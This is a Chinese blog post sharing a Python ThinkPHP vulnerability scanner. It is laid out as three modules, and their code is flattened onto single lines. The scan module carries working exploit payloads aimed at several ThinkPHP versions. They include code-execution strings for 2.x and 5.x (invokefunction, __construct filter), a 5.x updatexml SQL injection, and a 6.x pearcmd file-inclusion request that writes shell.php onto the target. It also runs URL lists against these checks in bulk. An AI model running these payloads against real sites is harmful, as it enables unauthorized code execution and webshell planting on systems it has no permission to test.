当前位置：首页 > news >正文

python项目: Thinkphp框架漏洞扫描器集成

news 2025/9/24 8:36:16

前言

该项目是将thinkphp各漏洞的漏扫器集成在一个项目中。

核心

该项目主要使用python代码完成，使用了bs4，requests，urllib等模块，使用了面向对象的编程方法，在展示上主要使用了rich模块。

代码

main.py (主函数，来调动其他两个函数，并接收输入的参数)

import argparse
import datetime
import sys
import thinkphp_rprint as rprint
from thinkphp_scan import start_scandef get_time():now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')return nowif __name__ == '__main__':parser = argparse.ArgumentParser(description='Mirror的thinkphp漏洞扫描器')parser.add_argument('-url' ,'--url' ,type=str, help='请输出目标的url')parser.add_argument('-file', '--file', type=str, help='请输入待检测存在漏洞url的txt文件')args = parser.parse_args()if '-url' in sys.argv:rprint.info(get_time(), "thinkphp漏洞检测开始")start_scan(args.url)rprint.info(get_time(), "thinkphp漏洞检测结束")elif '-file' in sys.argv:file = open(args.file, 'r')rprint.info(get_time(), "thinkphp漏洞检测开始")for url in file:start_scan(url)rprint.info(get_time(), "thinkphp漏洞检测结束")

thinkphp_scan.py (来执行对漏洞检测的部分)

import datetime
import requests
from urllib.parse import *
import thinkphp_rprint as rprintdef get_time():now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')return nowclass ThinkphpScan:def __init__(self):passdef thinkphp_2x_scan(url):result = {"name" : "thinkphp_2x_scan","vulnerable" : False,}try:payload = "?s=/handsome/jing/zi/${var_dump(md5(Mirror))}"urls = urljoin(url, payload)response = requests.get(url=urls)# 判断 md5(handsome_Mirror) 在数据包中是否存在if '2403def5083f02105e7802b3b315681e' in response.text:result['vulnerable'] = Trueresult['method'] = 'GET'result['url'] = urlsresult['payload'] = payloadreturn resultelse:return resultexcept :return resultdef thinkphp_5_0_23_scan(url):result = {"name" : "thinkphp_5_0_23_scan","vulnerable" : False}payload = {'_method' : '__construct','filter[]' : 'phpinfo','method' : 'get','server[REQUEST_METHOD]' : '1'}try:path = '/index.php?s=captcha'target = urljoin(url, path)response = requests.post(url=target, data=payload, verify=False)# print(response.text)if "PHP Version" in response.text:result['vulnerable'] = Trueresult['method'] = 'POST'result['url'] = targetresult['payload'] = payloadreturn resultelse:return resultexcept:return resultdef thinkphp_5_rce_scan(url):result = {"name": "thinkphp5-5.0.22/5.1.29 RCE","vulnerable": False}try:poc = r'/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=handsome_Mirror'payload = urljoin(url, poc)response = requests.get(payload, verify=False)if '2f0477618daf4574f9e0e50eb84a7f8e' in response.text:result['vulnerable'] = Trueresult['method'] = 'GET'result['url'] = payloadresult['payload'] = pocreturn resultelse:return resultexcept:return resultdef thinkphp_5_sqli(url):result = {"name": "thinkphp5 sql injection and Sensitive information leakage","vulnerable": False}try:poc = '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1'url = urljoin(url, poc)response = requests.get(url, verify=False)if 'XPATH syntax error' in response.text:result['vulnerable'] = Trueresult['method'] = 'GET'result['url'] = urlresult['payload'] = urlreturn resultelse:return resultexcept:return resultdef thinkphp_6_upload(url):result = {"name": "thinkphp6 lang local file inclusion","vulnerable": False}try:poc = 'index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php'url_1 = urljoin(url, poc)response_1 = requests.get(url_1, verify=False)url_2 = url + '/shell.php'response_2 = requests.get(url_2, verify=False)if response_2.status_code == 200:result['vulnerable'] = Trueresult['method'] = 'GET'result['url'] = url_2result['payload'] = url_1return resultelse:return resultexcept:return resultdef start_scan(self):scan = ThinkphpScan.thinkphp_2x_scan(self)rprint.info(get_time(), scan['name'] + str('  ' + str(scan['vulnerable'])))scan = ThinkphpScan.thinkphp_5_0_23_scan(self)rprint.info(get_time(), scan['name'] + str('  ' + str(scan['vulnerable'])))scan = ThinkphpScan.thinkphp_5_rce_scan(self)rprint.info(get_time(), scan['name'] + str('  ' + str(scan['vulnerable'])))scan = ThinkphpScan.thinkphp_5_sqli(self)rprint.info(get_time(), scan['name'] + str('  ' + str(scan['vulnerable'])))scan = ThinkphpScan.thinkphp_6_upload(self)rprint.info(get_time(), scan['name'] + str('  ' + str(scan['vulnerable'])))

thinkphp_rprint (主要是来进行界面的优化)

from rich import print as rprintdef error(date, body):rprint("[[bold green]" + date + "[/bold green]] [[bold red]Error[/bold red]] > [bold yellow]" + body + "[/bold yellow]")def success(date, body):rprint("[[bold green]" + date + "[/bold green]] [[bold green]Success[/bold green]] > " + body)def info(date, body):rprint("[[bold green]" + date + "[/bold green]] [[bold blue]Info[/bold blue]] > " + body)

查看全文

http://www.dtcms.com/a/398769.html